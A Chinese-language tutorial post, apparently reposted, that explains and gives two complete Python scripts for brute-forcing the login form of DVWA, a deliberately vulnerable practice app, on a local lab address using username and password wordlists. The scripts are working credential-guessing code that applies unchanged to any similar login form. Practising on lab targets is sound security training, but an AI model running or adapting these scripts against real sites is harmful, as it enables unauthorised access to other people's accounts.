一个简单的Python暴力破解网站登录密码脚本
关键代码解释
url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"
header设置请求头
header = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
'Cookie':'security=medium; PHPSESSID=geo7gb3ehf5gfnbhrvuqu545i7'
}
payload设置请求参数
payload = {'username':username,'password':password,"Login":'Login'}
这一行的作用是做一次get请求,响应信息被变量Response接收
Response = requests.get(url,params=payload,headers=header)
for admin in open("C:\\Users\\admin\\Documents\\字典\\账号.txt"):
for line in open("C:\\Users\\admin\\Documents\\字典\\密码.txt"):
result = str(Response.status_code) + ',' + username + ','\
+ password + ',' + str(len(Response.content))
f.write(result + '\n')
完整代码
方法一
import requests
url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"
#proxies= {"http":"http://127.0.0.1:8080"} #代理设置,方便burp抓包查看
header = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
'Cookie':'security=medium; PHPSESSID=bdi0ak5mqbud69nrnejgf8q00u'
}
f = open('result.csv','w')
f.write('状态码' + ',' + '用户名' + ',' + '密码' + ',' + '包长度' + '\n')
for admin in open("C:\\Users\\admin\\Documents\\字典\\账号.txt"):
for line in open("C:\\Users\\admin\\Documents\\字典\\密码.txt"):
username = admin.strip()
password = line.strip()
payload = {'username':username,'password':password,"Login":'Login'}
Response = requests.get(url,params=payload,headers=header)
result = str(Response.status_code) + ',' + username + ','\
+ password + ',' + str(len(Response.content))
f.write(result + '\n')
print('\n完成')
运行结果
方法二
import requests
url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"
#proxies= {"http":"http://127.0.0.1:8080"} #代理设置,方便burp抓包查看
header = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
'Cookie':'security=medium; PHPSESSID=bdi0ak5mqbud69nrnejgf8q00u'
}
f = open('result.txt','w')
for admin in open("C:\\Users\\admin\\Documents\\字典\\账号.txt"):
for line in open("C:\\Users\\admin\\Documents\\字典\\密码.txt"):
username = admin.strip()
password = line.strip()
payload = {'username':username,'password':password,"Login":'Login'}
Response = requests.get(url,params=payload,headers=header)
if not(Response.text.find('Welcome to the password protected area')==-1):
result = username + ':' + password
print(result)
f.write(result + '\n')
print('\n完成')
运行结果
文章转载:Python编程学习圈
(版权归原作者所有,侵删)
点击下方“阅读原文”查看更多
评论